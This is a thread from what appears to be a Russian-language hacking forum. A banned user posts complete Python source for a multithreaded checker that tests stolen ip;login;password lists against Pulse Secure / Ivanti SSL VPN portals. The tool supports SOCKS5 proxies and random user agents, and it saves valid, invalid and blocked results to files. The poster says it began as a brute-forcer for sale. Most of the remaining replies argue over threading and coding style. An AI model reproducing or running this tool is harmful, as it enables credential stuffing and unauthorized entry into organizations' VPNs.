• XSS.stack #1 – первый литературный журнал от юзеров форума

чекер Pulse Secure / Ivanti SSL VPN [ip;login;passw]

barnaul

(L3) cache
Забанен
Регистрация
07.10.2023
Сообщения
192
Реакции
301
Гарант сделки
1
Пожалуйста, обратите внимание, что пользователь заблокирован
Изначально писалось как брут на продажу (только день потерял в пустую), но для паблика переделал в чекер.
Креды формата: ip;login;password
Тестировал на небольшой выборке валидок (25шт) поэтому возможны неучтенные ситуации, он их сохранит, а вы можете передать сюда репорт для багфикса.
Untitled.png

usage: proto_checker.py [-h] [-cf CREDS_FILE] [-t THREADS]

IVANTI VPN checker by barnaul

options:
-h, --help show this help message and exit
-cf CREDS_FILE Host-Creds file. Default: creds.txt
-t THREADS Threads number. Default: 1
Установка зависимостей
Код:
pip install bs4 requests user_agent

Python:
import argparse
import sys
import time
from pathlib import Path
from queue import Queue
from threading import RLock, Thread, active_count

try:
    import requests
    from bs4 import BeautifulSoup
    from urllib3 import disable_warnings
    from user_agent import generate_user_agent
except ImportError as err:
    print(f'[-] {err}:\n\tcmd> pip install -r requirements.txt')
    sys.exit(input('Press Enter to exit...'))


LOCK = RLock()
Q_CREDS = Queue()
PATH = Path(__file__).parent
RES_DIR = PATH.joinpath('RESULTS')
Path.mkdir(RES_DIR, exist_ok=True)
disable_warnings()


class BadLoginPage(Exception):
    pass


class IvantiChecker:

    WELCM = '/dana-na/auth/url_default/welcome.cgi'
    LOGIN = '/dana-na/auth/url_default/login.cgi'

    def __init__(self, host, proxy=None):
        host = host.split('/dana-na')[0]
        self.host = host if '://' in host \
            else 'https://' + host

        self.sess = requests.Session()
        self.sess.verify = False
        self.change_identity(proxy)

    def change_identity(self, proxy=None):
        self.sess.headers.update({
            'User-Agent': generate_user_agent()
        })

        self.sess.proxies = {
            'http': 'socks5://' + proxy,
            'https': 'socks5://' + proxy,
        } if proxy else {}

    def is_available(self):
        try:
            self.sess.get(self.host + self.WELCM)
            return True
        except:
            return False

    def _check_login_page(self):
        resp = self.sess.get(self.host + self.WELCM)

        err_text = None
        if not any((
            'id="frmLogin' in resp.text,
            'action="login.cgi"' in resp.text,
        )):
            err_text = 'Login Form not found'
        if 'do not have permission to login' in resp.text:
            err_text = 'Not Have Permission to Login'
        if '/dana-na/setup/psaldownload.cgi' in resp.url:
            err_text = 'Update Helper Required'
        if 'PleaseWait' in resp.text:
            err_text = 'Please Wait'

        if err_text:
            raise BadLoginPage(err_text)

        return resp

    def _check_login_resp(self, resp):
        if any((
            resp.cookies.get('id'),
            '?p=user-confirm' in resp.url,
            '/dana/home' in resp.url,
            '?p=sn-postauth-show' in resp.url,
            'p=passwordChange' in resp.url,
        )):
            return 'valid'

        if any((
            '?p=failed' in resp.url,
        )):
            return 'invalid'

        if '?p=ip-blocked' in resp.url:
            return 'blocked'

        return 'unknown'

    def login(self, username, password):
        resp = self._check_login_page()
        soup = BeautifulSoup(resp.text, 'html.parser')

        form_el = soup.find('form', {'name':'frmLogin'})
        if not form_el:
            raise BadLoginPage('Login Form not found')

        inputs = form_el.select('input')
        post_data = {
            inp.get('name'):inp.get('value', '')
            for inp in inputs
        }

        realm_el = form_el.find(
            'select', {'name':'realm'}
        ) or form_el.find(
            'input', {'name':'realm'}
        )

        if realm_el.name == 'input':
            realms = [realm_el.get('value', '')]

        if realm_el.name == 'select':
            options = realm_el.select('option')
            realms = [r.get('value', '') for r in options]

        post_data['username'] = username
        post_data['password'] = password
        for realm in realms:
            post_data['realm'] = realm
            resp = self.sess.post(
                self.host + self.LOGIN,
                data=post_data,
            )
            status = self._check_login_resp(resp)
            if status == 'valid':
                break

        return status


def worker():
    while not Q_CREDS.empty():
        cred = Q_CREDS.get()
        host, username, password = cred.split(';')

        client = IvantiChecker(host)
        if not client.is_available():
            msg(f'[-] {host} - unavailable')
            save_results('unavailable.txt', host)
            continue

        try:
            status = client.login(username, password)
        except BadLoginPage as err:
            msg(f'[-] {cred} - bad login page - {err}')
            save_results('bad_login_page.txt', f'{cred} - {err}')
            continue
        except Exception as err:
            msg(f'[-] {cred} - login error - {err}')
            save_results('errors_log.txt', f'{cred} - {err}')
            continue

        pref = '[+]' if status == 'valid' else '[-]'
        msg(f'{pref} {cred} - {status.upper()}')
        save_results(f'{status}.txt', f'{cred}')


def msg(string):
    with LOCK:
        print(string)


def save_results(filename, data):
    with open(f'{RES_DIR.joinpath(filename)}', 'a') as f:
        f.write(data + '\n')


def read_file(filename):
    with open(filename, 'r') as f:
        return {
            line.rstrip() for line in f
            if line.rstrip()
        }


def get_args():
    parser = argparse.ArgumentParser(
        description='IVANTI VPN checker by barnaul'
    )

    parser.add_argument(
        '-cf',
        dest='creds_file',
        default='creds.txt',
        help='Host-Creds file. Default: %(default)s')

    parser.add_argument(
        '-t',
        dest='threads',
        type=int,
        default=1,
        help='Threads number. Default: %(default)s')

    return parser.parse_args()


def main():
    args = get_args()
    creds_file = PATH / args.creds_file
    if not creds_file.exists():
        print(f'[-] File not found: {creds_file}')
        sys.exit(input('Press Enter to exit...'))

    for cred in read_file(creds_file):
        if cred.count(';') != 2:
            print(f'[-] Wrong creds format: {cred}')
            continue
        Q_CREDS.put(cred)

    for _ in range(args.threads):
        t = Thread(
            target=worker,
            daemon=True,
        ).start()

    try:
        while active_count() > 1:
            time.sleep(1)
        print('[~] All tasks done')
    except KeyboardInterrupt:
        sys.exit('[~] Exit...')


if __name__ == '__main__':
    main()
 
Последнее редактирование:
for _ in range(args.threads): t = Thread( target=worker, daemon=True, ).start() try: while active_count() > 1: time.sleep(1)
You can use `concurrent.futures.ThreadPoolExecutor` instead. ThreadPoolExecutor has a queue pool, and handles the exit logic, which waits for all threads to be completed before exit.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Thanks, I know about this. But it annoys me because it requires overhead code to stop normally after KeyboardInterrupt, and in my practice it can sometimes freeze
 
But it annoys me because it requires overhead code to stop normally after KeyboardInterrupt, and in my practice it can sometimes freeze
I intercept KeyboardInterrupt exceptions and do os.exit()
 
Пожалуйста, обратите внимание, что пользователь заблокирован
As an example:
Python:
from concurrent.futures import ThreadPoolExecutor

def parse(line: str) -> tuple[str, str, str]:
    split = line.strip().split(";")
   
    if len(split) < 3 or len(split) > 3:
        raise Exception("Invalid credential format")
       
    return split
   
def do_login(creds: tuple[str, str, str]):
    # Logic in there

if __name__ == "__main__":
    try:
        with ThreadPoolExecutor(max_workers=30) as exe: # max_workers is the number of threads
            for line in open("creds.txt", "r"):
                exe.submit(do_login, parse(line))
               
    except KeyboardInterrupt:
        __import__("sys").exit(0)
       
    except Exception as e:
        print(f"Something really bad happened: {e}")
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ok, try to stop it, lol
Python:
from concurrent.futures import ThreadPoolExecutor
import time
from random import randint
from queue import Queue

q_data = Queue()
for i in range(200):
    q_data.put(i)

def worker():
    while not q_data.empty():
        data = q_data.get()
        print('Hello', data)
        time.sleep(randint(1,5))


if __name__ == "__main__":
    threads = 30
    try:
        with ThreadPoolExecutor(max_workers=threads) as pool:
            for i in range(threads):
                pool.submit(worker)
    except KeyboardInterrupt:
        __import__("sys").exit(0)

    except Exception as e:
        print(f"Something really bad happened: {e}")

you came to show how it should be done, but you yourself do not understand the details of what you are talking about. The pool blocks the main thread, so until all the threads in the pool have completed their work, it will not exit it
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Windows. In Unix-like it is possible because they have their own SIGINT and it will kill the main thread at the OS level. But I write in Python, and I don't know on which OS the user will execute my code. I think, you even not needed KeyboardInterrupt for this
 
q_data = Queue() for i in range(200): q_data.put(i) def worker(): while not q_data.empty(): data = q_data.get() print('Hello', data) time.sleep(randint(1,5))
Btw, you don't need Queue with ThreadPoolExecutor. The `.submit` will add the function with a line from the file directly.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Btw, you don't need Queue with ThreadPoolExecutor. The `.submit` will add the function with a line from the file directly.
Oh, lol. Do it as you see fit, but no need to be smart here when you don't understand shit about the subject
 
Windows. In Unix-like it is possible because they have their own SIGINT and it will kill the main thread at the OS level. But I write in Python, and I don't know on which OS the user will execute my code. I think, you even not needed KeyboardInterrupt for this
It does exit for me in Windows 10 and Python311, lol
 
Пожалуйста, обратите внимание, что пользователь заблокирован
{B3398B98-22E5-4644-BE72-EC78BB924328}.png

wsl vs PS. and it has always been like this, on different versions of Windows
And in fact, in wsl does not work Exception, process just killed
 
Пожалуйста, обратите внимание, что пользователь заблокирован
These are just suggestions.
Suggestions with bullshit and bad practices? Сэнк ю, бл#ть
 
Пожалуйста, обратите внимание, что пользователь заблокирован
OMG, type hints, really? This are not needed here. They are used in large projects (and then by agreement, the convention does not oblige to use them), in teams and for correct work and consistency of developers. In small scripts, where everything is obvious, it does not matter, just overcode and garbage. Naming is enough. Pep8, where did I break it? My linter is silent. But why is there one empty line between your functions, dude?
Bad practices... ok. Look at you small leet-code
if len(split) < 3 or len(split) > 3
why not if len(split) != 3 or "fuck yourself"?
for line in open("creds.txt", "r")
unclosed file descriptor, oh no...
tuple[str, str, str])
so, if i have tuple with 25 strings... -> tuple[str, str, str, str, str, str..] right? 🤣

Just don't be so pressed, bro.

Upd
why did you remove the dislikes? Have you complained to the admin yet? Just don't forget to say that you started it yourself. I put it for a reason, and you got offended, lol. Whine-whine
 
Последнее редактирование:
Ok, since i already lost my precious time...
OMG, type hints, really? This are not needed here. They are used in large projects (and then by agreement, the convention does not oblige to use them), in teams and for correct work and consistency of developers. In small scripts, where everything is obvious, it does not matter, just overcode and garbage
PEP 484 emphasis the usage of type hints even on small scripts, since it improves SAST tools (and tools like CodeQL) results. So yeah, using type hints even on small scripts is good (but not strictly necessary).

why not if len(split) != 3 or "fuck yourself"?
Yes. My mistake there, sorry.

unclosed file descriptor, oh no...
1736181153361.png

You literally made the exact same "mistake" (If i recall correctly, python does close the FD whenever the with goes out of scope).

so, if i have tuple with 25 strings... -> tuple[str, str, str, str, str, str..] right? 🤣
If you are the so "proclaimed python master" you know that you can[1] alias types.

why did you remove the dislikes? Have you complained to the admin yet? Just don't forget to say that you started it yourself. I put it for a reason, and you got offended, lol. Whine-whine
I just realized that i don't need to do that, lol.

Resources:
- [1] = https://docs.python.org/3/library/typing.html#type-aliases
 
Пожалуйста, обратите внимание, что пользователь заблокирован
You literally made the exact same "mistake" (If i recall correctly, python does close the FD whenever the with goes out of scope).
Nope, __exit__() method close file automatically.
If you are the so "proclaimed python master" you know that you can[1] alias types.
You're either stupid or a python noob (maybe both). You picked up some smart practices, but you don’t understand what they are for. Go to sleep.

I will return the dislikes for your impudent and unfounded attack. Before you teach others, learn yourself. Closed
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх